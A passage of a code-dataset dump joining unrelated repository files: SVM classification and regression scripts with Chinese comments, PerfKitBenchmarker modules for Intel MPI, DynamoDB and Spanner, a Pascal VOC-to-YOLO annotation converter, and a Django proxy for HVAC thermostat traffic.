teaaa = getacc(resu, texd, teyd)
trainacc.append(traaa)
testacc.append(teaaa)
# 保存支持向量的个数
count = len(resu.alphas > 0)
vec.append(count)
sign.append(jj)
print(traaa, teaaa, count)
# 绘制多y轴图
fig, host = plt.subplots()
# 用来控制多y轴
par1 = host.twinx()
# 多条曲线
p1, = host.plot(sign, trainacc, "b-", marker='8', label='训练', linewidth=2)
pp, = host.plot(sign, testacc, "b--", marker='*', label='测试', linewidth=2)
p2, = par1.plot(sign, vec, "r-", marker='8', label='支持向量个数', linewidth=2)
# 每个轴的内容
host.set_xlabel("K折数据集")
host.set_ylabel("分类准确率")
par1.set_ylabel("个数")
# 控制每个y轴内容的颜色
host.yaxis.label.set_color(p1.get_color())
par1.yaxis.label.set_color(p2.get_color())
# 控制每个Y轴刻度数字的颜色以及线粗细
tkw = dict(size=6, width=3)
host.tick_params(axis='y', colors=p1.get_color(), **tkw)
par1.tick_params(axis='y', colors=p2.get_color(), **tkw)
# 添加图例
lines = [p1, pp, p2]
host.legend(lines, [l.get_label() for l in lines], loc='lower center')
# 添加标题
plt.title('K折心脏病数据集SVM分类结果对比 核函数:%s' % he)
# 控制每个Y轴刻度线的颜色
ax = plt.gca()
ax.spines['left'].set_color('blue')
ax.spines['right'].set_color('red')
# 显示图片
plt.show()
'''第四部分:最终的运行程序'''
if __name__ == "__main__":
# 核函数参数的选择很重要
result(sdata.kfold_train_datadict, 'rbf')
```
#### File: SVM/SVM_Classify/Sklearn_Classify_SVM.py
```python
"""
第一部分:引入库
"""
# 引入心脏病数据
import SVM_Classify_Data as sdata
# 引入库包
from sklearn import svm
import matplotlib.pyplot as plt
from pylab import mpl
mpl.rcParams['font.sans-serif'] = ['FangSong'] # 中文字体名称
mpl.rcParams['axes.unicode_minus'] = False # 显示负号
"""
第二部分:构建函数
"""
# 核函数
def sk_svm_train(intr, labeltr, inte, labelte, kener):
clf = svm.SVC(kernel=kener)
# 开始训练
clf.fit(intr, labeltr)
# 绘图的标识
figsign = kener
# 训练精确度
acc_train = clf.score(intr, labeltr)
# 测试精确度
acc_test = clf.score(inte, labelte)
# 支持向量的个数
vec_count = sum(clf.n_support_)
# 支持向量
vectors = clf.support_vectors_
return acc_train, acc_test, vec_count, vectors, figsign
# 结果输出函数
'''
‘linear’, ‘poly’, ‘rbf’, ‘sigmoid’
'''
# K折数据集字典
def result(datadict, he='rbf'):
sign = []
trainacc, testacc, vec = [], [], []
resu = []
for jj in datadict:
# 训练数据
xd = datadict[jj][0][:, :-1]
yd = datadict[jj][0][:, -1]
# 测试数据
texd = datadict[jj][1][:, :-1]
teyd = datadict[jj][1][:, -1]
# 开始训练
resu = sk_svm_train(xd, yd, texd, teyd, he)
# 储存结果
trainacc.append(resu[0])
testacc.append(resu[1])
vec.append(resu[2])
sign.append(jj)
# 绘制多y轴图
fig, host = plt.subplots()
# 用来控制多y轴
par1 = host.twinx()
# 多条曲线
p1, = host.plot(sign, trainacc, "b-", marker='8', label='训练', linewidth=2)
pp, = host.plot(sign, testacc, "b--", marker='*', label='测试', linewidth=2)
p2, = par1.plot(sign, vec, "r-", marker='8', label='支持向量个数', linewidth=2)
# 每个轴的内容
host.set_xlabel("K折数据集")
host.set_ylabel("分类准确率")
par1.set_ylabel("个数")
# 控制每个y轴内容的颜色
host.yaxis.label.set_color(p1.get_color())
par1.yaxis.label.set_color(p2.get_color())
# 控制每个Y轴刻度数字的颜色以及线粗细
tkw = dict(size=6, width=3)
host.tick_params(axis='y', colors=p1.get_color(), **tkw)
par1.tick_params(axis='y', colors=p2.get_color(), **tkw)
# 添加图例
lines = [p1, pp, p2]
host.legend(lines, [l.get_label() for l in lines], loc='lower center')
# 添加标题
plt.title('K折心脏病数据集SVM分类结果对比 核函数:%s' % resu[-1])
# 控制每个Y轴刻度线的颜色
ax = plt.gca()
ax.spines['left'].set_color('blue')
ax.spines['right'].set_color('red')
# 显示图片
plt.show()
'''第四部分:最终的运行程序'''
if __name__ == "__main__":
result(sdata.kfold_train_datadict, he='rbf')
```
#### File: SVM/SVM_Regression/Sklearn_SVM_Regression.py
```python
"""
第一部分:引入库
"""
# 引入部分的北京PM2.5数据
import SVM_Regression_Data as rdata
# 引入库包
from sklearn import svm
import numpy as np
import matplotlib.pyplot as plt
from pylab import mpl
mpl.rcParams['font.sans-serif'] = ['FangSong'] # 中文字体名称
mpl.rcParams['axes.unicode_minus'] = False # 显示负号
"""
第二部分:构建函数
"""
# 核函数
def sk_svm_train(intr, labeltr, inte, kener):
clf = svm.SVR(kernel=kener)
# 开始训练
clf.fit(intr, labeltr)
# 训练输出
tr = clf.predict(intr)
# 预测输出
pr = clf.predict(inte)
return tr, pr
# 结果输出函数
'''
‘linear’, ‘poly’, ‘rbf’, ‘sigmoid’
'''
# 数据集
def result(data, he='rbf'):
# 训练、预测的网络输出
trainacc, testacc = [], []
xd = data[0]
yd = data[1].T[0]
# 测试数据
texd = data[2]
teyd = data[3].T[0]
# 开始训练
resu = sk_svm_train(xd, yd, texd, he)
tra = resu[0] * (data[4][1] - data[4][0]) + data[4][0]
pre = resu[1] * (data[4][1] - data[4][0]) + data[4][0]
ydd = data[1].T[0] * (data[4][1] - data[4][0]) + data[4][0]
teyd = data[3].T[0] * (data[4][1] - data[4][0]) + data[4][0]
return ydd, tra, teyd, pre
# 绘图的函数
def huitu(suout, shiout, c=['b', 'k'], sign='训练', cudu=3):
# 绘制原始数据和预测数据的对比
plt.subplot(2, 1, 1)
plt.plot(list(range(len(suout))), suout, c=c[0], linewidth=cudu, label='%s:算法输出' % sign)
plt.plot(list(range(len(shiout))), shiout, c=c[1], linewidth=cudu, label='%s:实际值' % sign)
plt.legend(loc='best')
plt.title('原始数据和向量机输出数据的对比')
# 绘制误差和0的对比图
plt.subplot(2, 2, 3)
plt.plot(list(range(len(suout))), suout - shiout, c='r', linewidth=cudu, label='%s:误差' % sign)
plt.plot(list(range(len(suout))), list(np.zeros(len(suout))), c='k', linewidth=cudu, label='0值')
plt.legend(loc='best')
plt.title('误差和0的对比')
# 需要添加一个误差的分布图
plt.subplot(2, 2, 4)
plt.hist(suout - shiout, 50, facecolor='g', alpha=0.75)
plt.title('误差直方图')
# 显示
plt.show()
'''第四部分:最终的运行程序'''
if __name__ == "__main__":
datasvr = rdata.model_data
realtr, outtri, realpre, poupre = result(datasvr, he='rbf')
huitu(realtr, outtri, c=['b', 'k'], sign='训练', cudu=1.5)
huitu(realpre, poupre, c=['b', 'k'], sign='预测', cudu=1.5)
```
#### File: SVM/SVM_Regression/SVM_Regression_Data.py
```python
import pandas as pd
import numpy as np
data = pd.read_csv(r'C:\Users\GWT9\Desktop\PRSA_data_2010.1.1-2014.12.31.csv')
# 数据处理
# 目标字段是pm2.5,因此删去此列为NaN的行
data_nan = data[np.isfinite(data['pm2.5'])]
# 第一个字段是序号字段,不需要
data_one = data_nan[data_nan.columns[1:]]
# 字段'cbwd',独热编码
one_data = pd.get_dummies(data_one['cbwd'], prefix='cbwd')
# 删除原来的字段'cbwd'
data_cw = data_one.drop(['cbwd'], axis=1)
# 添加上独热产生的数据
data_hh = pd.concat([data_cw, one_data], axis=1)
# 因为数据量的问题, 只是随机选取部分数据进行训练
def serand(dafra, precent=0.01):
df2 = dafra.sample(frac=precent)
return df2
data_hh = serand(data_hh)
# 获得目标数据的最大与最小值,
ymax = np.max(data_hh['pm2.5'].values, keepdims=True)
ymin = np.min(data_hh['pm2.5'].values, keepdims=True)
# 所有特征数据标准化, 目标数据0-1化
def norm(dat):
da = pd.DataFrame()
for hh in dat.columns:
if hh != 'pm2.5':
da[hh] = (dat[hh] - np.mean(dat[hh])) / np.std(dat[hh]) # 标准化
# da[hh] = (dat[hh] - np.min(dat[hh])) / (np.max(dat[hh]) - np.min(dat[hh])) # 0-1化
else:
da[hh] = (dat[hh] - np.min(dat[hh])) / (np.max(dat[hh]) - np.min(dat[hh])) # 0-1化
return da
datee = norm(data_hh)
# 目标数据和特征数据分离
Ydata = np.array(datee['pm2.5'].values).reshape(-1, 1) # 目标数据
Xdata = datee.drop(['pm2.5'], axis=1).values # 特征数据
# 训练数据分为测试数据和预测数据
def divided(xdata, ydata, percent=0.3):
sign_list = list(range(len(xdata)))
# 用于测试的序号
select_sign = np.random.choice(sign_list, int(len(xdata) * percent), replace=False)
# 用于训练的序号
no_select_sign = [isign for isign in sign_list if isign not in select_sign]
# 测试数据
x_predict_data = xdata[select_sign]
y_predict_data = np.array(ydata[select_sign]).reshape(-1, len(ydata[0])) # 转化数据结构
# 训练数据
x_train_data = xdata[no_select_sign]
y_train_data = np.array(ydata[no_select_sign]).reshape(-1, len(ydata[0])) # 转化数据结构
return x_train_data, y_train_data, x_predict_data, y_predict_data # 训练的x,y; 测试的x,y;
# 可用于算法的数据
model_data = list(divided(Xdata, Ydata))
model_data.append([ymax, ymin])
``` |
{
"source": "jojoya/PerfKitBenchmarker",
"score": 2
} |
#### File: perfkitbenchmarker/linux_packages/intelmpi.py
```python
import logging
from absl import flags
from perfkitbenchmarker.linux_packages import intel_repo
MPI_VERSION = flags.DEFINE_string('intelmpi_version', '2019.6-088',
'MPI version.')
FLAGS = flags.FLAGS
def MpiVars(vm) -> str:
"""Returns the path to the mpivars.sh file.
With different versions of Intel software installed the mpivars.sh for
2019.6 can be under compilers_and_libraries_2020.0.166 while the symlink
for compilers_and_libraries points to compilers_and_libraries_2018
Args:
vm: Virtual machine to look for mpivars.sh on.
"""
txt, _ = vm.RemoteCommand('readlink -f /opt/intel/compilers_and_libraries*/'
'linux/mpi/intel64/bin/mpivars.sh | sort | uniq')
files = txt.splitlines()
if not files:
raise ValueError('Could not find the mpivars.sh file')
if len(files) > 1:
logging.info('More than 1 mpivars.sh found, returning first: %s', files)
return files[0]
def FixEnvironment(vm):
"""Changes system settings for optimal Intel MPI conditions.
Sets the ptrace_scope to 0, for details see:
https://www.kernel.org/doc/Documentation/security/Yama.txt
Args:
vm: The virtual machine to run on.
"""
if not vm.TryRemoteCommand('ulimit -l | grep unlimited'):
ulimit_fix_cmd = (f'echo "{vm.user_name} - memlock unlimited" | '
'sudo tee -a /etc/security/limits.conf')
vm.RemoteCommand(ulimit_fix_cmd)
logging.info('Rebooting to permamently set ulimit')
vm.Reboot()
vm.WaitForBootCompletion()
vm.RemoteCommand('sudo sysctl -w kernel.yama.ptrace_scope=0')
def _Install(vm, mpi_version: str) -> None:
"""Installs Intel MPI."""
vm.InstallPackages(f'intel-mpi-{mpi_version}')
FixEnvironment(vm)
# Log the version of MPI and other associated values for debugging
vm.RemoteCommand(f'. {MpiVars(vm)}; mpirun -V')
def AptInstall(vm) -> None:
"""Installs the MPI library."""
intel_repo.AptPrepare(vm)
_Install(vm, MPI_VERSION.value)
# Ubuntu's POSIX dash shell does not have bash's "==" comparator
vm.RemoteCommand(f'sudo sed -i "s/==/=/" {MpiVars(vm)}')
def YumInstall(vm) -> None:
"""Installs the MPI library."""
intel_repo.YumPrepare(vm)
_Install(vm, MPI_VERSION.value)
```
#### File: providers/aws/aws_dynamodb.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import logging
from absl import flags
from perfkitbenchmarker import non_relational_db
from perfkitbenchmarker import vm_util
from perfkitbenchmarker.providers.aws import util
from six.moves import range
FLAGS = flags.FLAGS
flags.DEFINE_string('aws_dynamodb_primarykey',
'primary_key',
'The primaryKey of dynamodb table.'
'This switches to sortkey if using sort.'
'If testing GSI/LSI, use the range keyname'
'of the index you want to test')
flags.DEFINE_boolean('aws_dynamodb_use_sort',
False,
'determine whether to use sort key or not')
flags.DEFINE_string('aws_dynamodb_sortkey',
'sort_key',
'The sortkey of dynamodb table. '
'This switches to primarykey if using sort.'
'If testing GSI/LSI, use the primary keyname'
'of the index you want to test')
flags.DEFINE_enum('aws_dynamodb_attributetype',
'S', ['S', 'N', 'B'],
'The type of attribute, default to S (String).'
'Alternates are N (Number) and B (Binary).')
flags.DEFINE_integer('aws_dynamodb_read_capacity',
'5',
'Set RCU for dynamodb table')
flags.DEFINE_integer('aws_dynamodb_write_capacity',
'5',
'Set WCU for dynamodb table')
flags.DEFINE_integer('aws_dynamodb_lsi_count',
0, 'Set amount of Local Secondary Indexes. Only set 0-5')
flags.register_validator('aws_dynamodb_lsi_count',
lambda value: -1 < value < 6,
message='--count must be from 0-5')
flags.register_validator('aws_dynamodb_use_sort',
lambda sort: sort or not FLAGS.aws_dynamodb_lsi_count,
message='--aws_dynamodb_lsi_count requires sort key.')
flags.DEFINE_integer('aws_dynamodb_gsi_count',
0, 'Set amount of Global Secondary Indexes. Only set 0-5')
flags.register_validator('aws_dynamodb_gsi_count',
lambda value: -1 < value < 6,
message='--count must be from 0-5')
flags.DEFINE_boolean('aws_dynamodb_ycsb_consistentReads',
False,
"Consistent reads cost 2x eventual reads. "
"'false' is default which is eventual")
flags.DEFINE_integer('aws_dynamodb_connectMax', 50,
'Maximum number of concurrent dynamodb connections. '
'Defaults to 50.')
class _GetIndexes():
"""Used to create secondary indexes."""
def __init__(self):
self.lsi_count = FLAGS.aws_dynamodb_lsi_count
self.gsi_count = FLAGS.aws_dynamodb_gsi_count
def CreateLocalSecondaryIndex(self):
"""Used to create local secondary indexes."""
lsi_items = []
lsi_entry = []
attr_list = []
for lsi in range(0, self.lsi_count):
lsi_item = ('{{"IndexName": "lsiidx{0}",'
'"KeySchema": [{{'
'"AttributeName": "{1}",'
'"KeyType": "HASH"}},{{'
'"AttributeName": "lattr{2}",'
'"KeyType": "RANGE"}}],'
'"Projection": {{'
'"ProjectionType": "KEYS_ONLY"}}}}'.format(
str(lsi),
FLAGS.aws_dynamodb_primarykey,
str(lsi)))
lsi_entry.append(lsi_item)
attr_list.append('{{"AttributeName": "lattr{0}","AttributeType": "{1}"}}'
.format(str(lsi), FLAGS.aws_dynamodb_attributetype))
lsi_items.append('[' + ','.join(lsi_entry) + ']')
lsi_items.append(','.join(attr_list))
return lsi_items
def CreateGlobalSecondaryIndex(self):
"""Used to create global secondary indexes."""
gsi_items = []
gsi_entry = []
attr_list = []
for gsi in range(0, self.gsi_count):
gsi_item = ('{{"IndexName": "gsiidx{0}",'
'"KeySchema": [{{'
'"AttributeName": "gsikey{1}",'
'"KeyType": "HASH"}},{{'
'"AttributeName": "gattr{2}",'
'"KeyType": "RANGE"}}],'
'"Projection": {{'
'"ProjectionType": "KEYS_ONLY"}},'
'"ProvisionedThroughput": {{'
'"ReadCapacityUnits": {3},'
'"WriteCapacityUnits": {4}}}}}'.format(str(gsi),
str(gsi),
str(gsi),
5, 5))
gsi_entry.append(gsi_item)
attr_list.append('{{"AttributeName": "gattr{0}","AttributeType": "{1}"}}'
.format(str(gsi), FLAGS.aws_dynamodb_attributetype))
attr_list.append('{{"AttributeName": "gsikey{0}","AttributeType": "{1}"}}'
.format(str(gsi), FLAGS.aws_dynamodb_attributetype))
gsi_items.append('[' + ','.join(gsi_entry) + ']')
gsi_items.append(','.join(attr_list))
return gsi_items
class AwsDynamoDBInstance(non_relational_db.BaseNonRelationalDb):
"""Class for working with DynamoDB."""
SERVICE_TYPE = non_relational_db.DYNAMODB
def __init__(self, table_name, **kwargs):
super(AwsDynamoDBInstance, self).__init__(**kwargs)
self.zone = FLAGS.zones[0] if FLAGS.zones else FLAGS.zone[0]
self.region = util.GetRegionFromZone(self.zone)
self.primary_key = ('{{\"AttributeName\": \"{0}\",\"KeyType\": \"HASH\"}}'
.format(FLAGS.aws_dynamodb_primarykey))
self.sort_key = ('{{\"AttributeName\": \"{0}\",\"KeyType\": \"RANGE\"}}'
.format(FLAGS.aws_dynamodb_sortkey))
self.part_attributes = ('{{\"AttributeName\": \"{0}\",'
'\"AttributeType\": \"{1}\"}}'
.format(FLAGS.aws_dynamodb_primarykey,
FLAGS.aws_dynamodb_attributetype))
self.sort_attributes = ('{{\"AttributeName\": \"{0}\",'
'\"AttributeType\": \"{1}\"}}'
.format(FLAGS.aws_dynamodb_sortkey,
FLAGS.aws_dynamodb_attributetype))
self.table_name = table_name
self.throughput = 'ReadCapacityUnits={read},WriteCapacityUnits={write}'.format(
read=FLAGS.aws_dynamodb_read_capacity,
write=FLAGS.aws_dynamodb_write_capacity)
self.lsi_indexes = _GetIndexes().CreateLocalSecondaryIndex()
self.gsi_indexes = _GetIndexes().CreateGlobalSecondaryIndex()
def _Create(self):
"""Creates the dynamodb table."""
cmd = util.AWS_PREFIX + [
'dynamodb',
'create-table',
'--region', self.region,
'--table-name', self.table_name,
'--attribute-definitions', self.part_attributes,
'--key-schema', self.primary_key,
'--provisioned-throughput', self.throughput,
'--tags'] + util.MakeFormattedDefaultTags()
if FLAGS.aws_dynamodb_lsi_count > 0 and FLAGS.aws_dynamodb_use_sort:
cmd[10] = (
'[' + self.part_attributes + ', ' + self.sort_attributes + ', ' +
self.lsi_indexes[1] + ']')
logging.info('adding to --attribute definitions')
cmd.append('--local-secondary-indexes')
cmd.append(self.lsi_indexes[0])
cmd[12] = ('[' + self.primary_key + ', ' + self.sort_key + ']')
logging.info('adding to --key-schema')
elif FLAGS.aws_dynamodb_use_sort:
cmd[10] = ('[' + self.part_attributes + ', ' + self.sort_attributes + ']')
logging.info('adding to --attribute definitions')
cmd[12] = ('[' + self.primary_key + ', ' + self.sort_key + ']')
logging.info('adding to --key-schema')
if FLAGS.aws_dynamodb_gsi_count > 0:
cmd[10] = cmd[10][:-1]
cmd[10] += (', ' + self.gsi_indexes[1] + ']')
logging.info('adding to --attribute definitions')
cmd.append('--global-secondary-indexes')
cmd.append(self.gsi_indexes[0])
_, stderror, retcode = vm_util.IssueCommand(cmd, raise_on_failure=False)
if retcode != 0:
logging.warning('Failed to create table! %s', stderror)
def _Delete(self):
"""Deletes the dynamodb table."""
cmd = util.AWS_PREFIX + [
'dynamodb',
'delete-table',
'--region', self.region,
'--table-name', self.table_name]
logging.info('Attempting deletion: ')
vm_util.IssueCommand(cmd, raise_on_failure=False)
def _IsReady(self):
"""Check if dynamodb table is ready."""
logging.info('Getting table ready status for %s', self.table_name)
cmd = util.AWS_PREFIX + [
'dynamodb',
'describe-table',
'--region', self.region,
'--table-name', self.table_name]
stdout, _, _ = vm_util.IssueCommand(cmd)
result = json.loads(stdout)
return result['Table']['TableStatus'] == 'ACTIVE'
def _Exists(self):
"""Returns true if the dynamodb table exists."""
logging.info('Checking if table %s exists', self.table_name)
cmd = util.AWS_PREFIX + [
'dynamodb',
'describe-table',
'--region', self.region,
'--table-name', self.table_name]
_, _, retcode = vm_util.IssueCommand(cmd, raise_on_failure=False)
if retcode != 0:
return False
else:
return True
def _DescribeTable(self):
"""Calls describe on dynamodb table."""
cmd = util.AWS_PREFIX + [
'dynamodb',
'describe-table',
'--region', self.region,
'--table-name', self.table_name]
stdout, stderr, retcode = vm_util.IssueCommand(cmd, raise_on_failure=False)
if retcode != 0:
logging.info('Could not find table %s, %s', self.table_name, stderr)
return {}
for table_info in json.loads(stdout)['Table']:
if table_info[3] == self.table_name:
return table_info
return {}
def GetEndPoint(self):
ddbep = 'http://dynamodb.{0}.amazonaws.com'.format(self.region)
return ddbep
def GetResourceMetadata(self):
"""Returns a dict containing metadata about the dynamodb instance.
Returns:
dict mapping string property key to value.
"""
return {
'aws_dynamodb_primarykey': FLAGS.aws_dynamodb_primarykey,
'aws_dynamodb_use_sort': FLAGS.aws_dynamodb_use_sort,
'aws_dynamodb_sortkey': FLAGS.aws_dynamodb_sortkey,
'aws_dynamodb_attributetype': FLAGS.aws_dynamodb_attributetype,
'aws_dynamodb_read_capacity': FLAGS.aws_dynamodb_read_capacity,
'aws_dynamodb_write_capacity': FLAGS.aws_dynamodb_write_capacity,
'aws_dynamodb_lsi_count': FLAGS.aws_dynamodb_lsi_count,
'aws_dynamodb_gsi_count': FLAGS.aws_dynamodb_gsi_count,
'aws_dynamodb_consistentReads': FLAGS.aws_dynamodb_ycsb_consistentReads,
'aws_dynamodb_connectMax': FLAGS.aws_dynamodb_connectMax,
}
def AddTagsToExistingInstance(table_name, region):
"""Add tags to an existing DynamoDB table."""
cmd = util.AWS_PREFIX + [
'dynamodb',
'describe-table',
'--table-name', table_name,
'--region', region
]
stdout, _, _ = vm_util.IssueCommand(cmd)
resource_arn = json.loads(stdout)['Table']['TableArn']
cmd = util.AWS_PREFIX + [
'dynamodb', 'tag-resource', '--resource-arn', resource_arn, '--region',
region, '--tags'
] + util.MakeFormattedDefaultTags()
vm_util.IssueCommand(cmd)
```
#### File: providers/gcp/gcp_spanner_test.py
```python
import unittest
from absl import flags
from absl.testing import flagsaver
from perfkitbenchmarker.providers.gcp import gcp_spanner
from tests import pkb_common_test_case
FLAGS = flags.FLAGS
class SpannerTest(pkb_common_test_case.PkbCommonTestCase):
def setUp(self):
super().setUp()
pass
@flagsaver.flagsaver
def testInitFromSpec(self):
FLAGS.zone = ['us-east1-a']
spec_args = {
'service_type': gcp_spanner.DEFAULT_SPANNER_TYPE,
'name': 'test_instance',
'description': 'test_description',
'database': 'test_database',
'ddl': 'test_schema',
'nodes': 2,
'project': 'test_project',
}
test_spec = gcp_spanner.SpannerSpec('test_component', None, **spec_args)
spanner = gcp_spanner.GcpSpannerInstance.FromSpec(test_spec)
self.assertEqual(spanner.name, 'test_instance')
self.assertEqual(spanner._description, 'test_description')
self.assertEqual(spanner.database, 'test_database')
self.assertEqual(spanner._ddl, 'test_schema')
self.assertEqual(spanner._nodes, 2)
self.assertEqual(spanner.project, 'test_project')
self.assertEqual(spanner._config, 'regional-us-east1')
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "jo-jstrm/Damaged-Package-Detection",
"score": 3
} |
#### File: aisscv/utils/pascal_voc_to_yolo.py
```python
import argparse
import glob
import os
import xml.etree.ElementTree as ET
from os.path import join
from tqdm import tqdm
def parse_args():
parser = argparse.ArgumentParser(
description="Sample Pascal VOC XML-to-YOLO converter")
parser.add_argument("-x",
"--xml_dir",
help="Path to the folder where the input .xml files are stored.",
type=str, default=None)
parser.add_argument("-o",
"--output_path",
help="Path of output (all yolo-training-related data).", type=str)
parser.add_argument("--relative_img_path",
help="Path to prepend to the train.txt files. This path must determines where "
"the training images will reside. Set train_txt_path to path/to/train.txt "
"you want to change.",
type=str, default="data/aisscv")
parser.add_argument("--train_txt_path",
help="Path to the train.txt file that you want to change. Only necessary if you want to modify this file with --relative_img_path.",
type=str, default=None)
parser.add_argument("--negative_image_dir",
help="If non-empty, adds empty .txt files for the images in the given path.",
type=str, default=None)
args = parser.parse_args()
return args
def change_train_txt_paths(train_txt_path: str, path_to_add: str) -> None:
"""Changes the path that is prepended to the image files in the train.txt file.
This path must be the path where the files for YOLO training will reside."""
dir = os.path.split(train_txt_path)[0]
tmp_file = os.path.join(dir, 'train_tmp.txt')
with open(train_txt_path) as f_in, open(tmp_file, 'a') as f_out:
for line in f_in:
line = os.path.split(line)[-1]
out_line = os.path.join(path_to_add, line)
f_out.write(out_line)
os.remove(train_txt_path)
os.rename(tmp_file, train_txt_path)
def create_obj_names(classes: list, out_dir: str) -> None:
"""Creates the obj.names file required for training."""
file = join(out_dir, 'aisscv.names')
if os.path.exists(file):
os.remove(file)
with open(file, 'a') as obj_names:
for name in classes:
obj_names.write(name + '\n')
def convert(size: tuple, box: tuple) -> tuple:
"""From https://github.com/AlexeyAB/darknet"""
dw = 1./size[0]
dh = 1./size[1]
x = (box[0] + box[1])/2.0
y = (box[2] + box[3])/2.0
w = box[1] - box[0]
h = box[3] - box[2]
x = x*dw
w = w*dw
y = y*dh
h = h*dh
return (x, y, w, h)
def convert_annotations(in_dir: str, classes: list, out_dir: str, relative_img_path: str) -> None:
"""Converts Pascal VOC annotations to YOLO annotations and creates a train.txt required
for training.
Adapted from https://github.com/AlexeyAB/darknet"""
filenames = []
annotation_dir = join(out_dir, "labels")
count = 0
if not os.path.exists(annotation_dir):
os.makedirs(annotation_dir)
for voc_file in tqdm(glob.glob(in_dir + '/*.xml'), desc="Processing XMLs..."):
tree = ET.parse(voc_file)
root = tree.getroot()
file = root.find('filename').text
filenames.append(file)
filename = file.split('.')[0]
out = join(annotation_dir, filename + ".txt")
out_file = open(out, 'w')
size = root.find('size')
w = int(size.find('width').text)
h = int(size.find('height').text)
for obj in root.iter('object'):
difficult = obj.find('difficult').text
cls = obj.find('name').text
if cls not in classes or int(difficult) == 1:
continue
cls_id = classes.index(cls)
xmlbox = obj.find('bndbox')
b = (float(xmlbox.find('xmin').text), float(xmlbox.find('xmax').text), float(
xmlbox.find('ymin').text), float(xmlbox.find('ymax').text))
bb = convert((w, h), b)
out_file.write(str(cls_id) + " " +
" ".join([str(a) for a in bb]) + '\n')
count += 1
# Write train_txt
train_file = join(out_dir, 'aisscv-train.txt')
if os.path.exists(train_file):
os.remove(train_file)
with open(train_file, 'a') as train_txt:
for file in filenames:
out_str = join(relative_img_path, file) + "\n"
train_txt.write(out_str)
print("Converted {} files.".format(count))
def main(args):
classes = ['box', 'open', 'dent', 'hole']
if args.train_txt_path is not None:
# Only executed if you want to change the paths
print("Changing img paths in train.txt to \"" +
args.relative_img_path + "\"")
change_train_txt_paths(os.path.join(args.train_txt_path),
args.relative_img_path)
return
if args.output_path is not None:
# Primary execution path for transforming labels
out_dir = os.path.expanduser(args.output_path)
if not os.path.exists(out_dir):
os.makedirs(out_dir)
if args.xml_dir is not None:
convert_annotations(args.xml_dir, classes,
out_dir, args.relative_img_path)
create_obj_names(classes, out_dir)
if __name__ == '__main__':
args = parse_args()
print('=========CALLED MAIN OF PASCAL2YOLO==========')
main(args)
``` |
{
"source": "jojurgens/pyqode.qt",
"score": 2
} |
#### File: jojurgens/pyqode.qt/setup.py
```python
import sys
from setuptools import setup, find_packages
def read_version():
with open("pyqode/qt/__init__.py") as f:
lines = f.read().splitlines()
for l in lines:
if "__version__" in l:
return l.split("=")[1].strip().replace(
"'", '').replace('"', '')
DESCRIPTION = 'Shim library that wraps PyQt5, PyQt4 and PySide'
def readme():
if 'bdist_deb' in sys.argv or 'sdist_dsc' in sys.argv:
return DESCRIPTION
return str(open('README.rst').read())
setup(
name='pyqode.qt',
namespace_packages=['pyqode'],
version=read_version(),
packages=[p for p in find_packages() if 'test' not in p],
keywords=["qt PyQt4 PyQt5 PySide"],
url='https://github.com/pyQode/pyqode.qt',
license='MIT',
author='<NAME>',
author_email='<EMAIL>',
description=DESCRIPTION,
long_description=readme(),
classifiers=[
'Development Status :: 5 - Production/Stable',
'Environment :: X11 Applications :: Qt',
'Environment :: Win32 (MS Windows)',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: Microsoft :: Windows',
'Operating System :: POSIX :: Linux',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Topic :: Software Development :: Widget Sets'])
``` |
{
"source": "jokajak/infinity_tracker",
"score": 2
} |
#### File: infinity_tracker/proxy/views.py
```python
import logging
# from django.conf import settings
from django.http import HttpResponse
from django.views.decorators.csrf import csrf_exempt
from requests import Request, Session
# from defusedxml import ElementTree as ET
# Get an instance of a logger
logger = logging.getLogger(__name__)
def proxy_request(request):
headers = dict(request.headers)
full_uri = request.build_absolute_uri()
method = request.method
content_length = int(request.headers.get("Content-Length", 0) or 0)
# now = datetime.datetime.now().strftime("%Y%m%d_%H%M")
# if settings.get("SAVE_REQUESTS", False) and content_length > 0 and request.method == "POST":
# fname = "req_{uri}_{now}.xml".format(
# uri=request.resolver_match.func.__name__, now=now
# )
# req_file = "{media}/{fname}".format(media=settings.MEDIA_ROOT, fname=fname)
# with open(req_file, "w") as f:
# f.write(request.POST["data"])
logger.debug("{method}: {uri}".format(method=method, uri=full_uri))
headers["Content-Length"] = str(content_length)
s = Session()
req = Request(method, full_uri, headers=headers, data=request.body)
prepped = req.prepare()
r = s.send(prepped)
logger.debug("Response: {response}".format(response=r.content))
# if settings.get("SAVE_RESPONSES", False) and r.content:
# fname = "resp_{uri}_{now}.xml".format(
# uri=request.resolver_match.func.__name__, now=now
# )
# req_file = "{media}/{fname}".format(media=settings.MEDIA_ROOT, fname=fname)
# with open(req_file, "wb") as f:
# f.write(r.content)
return r
# Create your views here.
@csrf_exempt
def release_notes(request, uri=None):
"""Handle release note requests.
Release note requests come in with a different URI as the path so they
must be handled differently.
"""
logger.info("Received release_notes request")
headers = dict(request.headers)
full_uri = "http{uri}".format(uri=uri)
method = request.method
content_length = int(request.headers.get("Content-Length", 0) or 0)
logger.debug("{method}: {uri}".format(method=method, uri=full_uri))
headers["Content-Length"] = str(content_length)
s = Session()
req = Request(method, full_uri, headers=headers, data=request.body)
prepped = req.prepare()
r = s.send(prepped)
logger.debug("Response: {response}".format(response=r.content))
return r
@csrf_exempt
def default_handler(request, path=None):
"""Handle all other requests
This view handles all other request types
"""
logger.info("Unmanaged path: {path}".format(path=path))
r = proxy_request(request)
response = HttpResponse(
content=r.content,
status=r.status_code,
content_type=r.headers.get("Content-Type"),
)
return response
@csrf_exempt
def alive(request):
"""Handle alive checks.
This view handles proxying alive checks performed by the HVAC unit.
"""
r = proxy_request(request)
response = HttpResponse(
content=r.content,
status=r.status_code,
content_type=r.headers.get("Content-Type"),
)
return response
@csrf_exempt
def systems_overview(request, serial):
"""Handle system posts.
This view handles processing system status updates by the HVAC unit.
"""
r = proxy_request(request)
response = HttpResponse(
content=r.content,
status=r.status_code,
content_type=r.headers.get("Content-Type"),
)
return response
@csrf_exempt
def systems_profile(request, serial):
"""Handle system profile posts.
This view handles processing system status updates by the HVAC unit.
"""
r = proxy_request(request)
response = HttpResponse(
content=r.content,
status=r.status_code,
content_type=r.headers.get("Content-Type"),
)
return response
@csrf_exempt
def systems_status(request, serial):
"""Handle system status posts.
This view handles processing system status updates by the HVAC unit.
"""
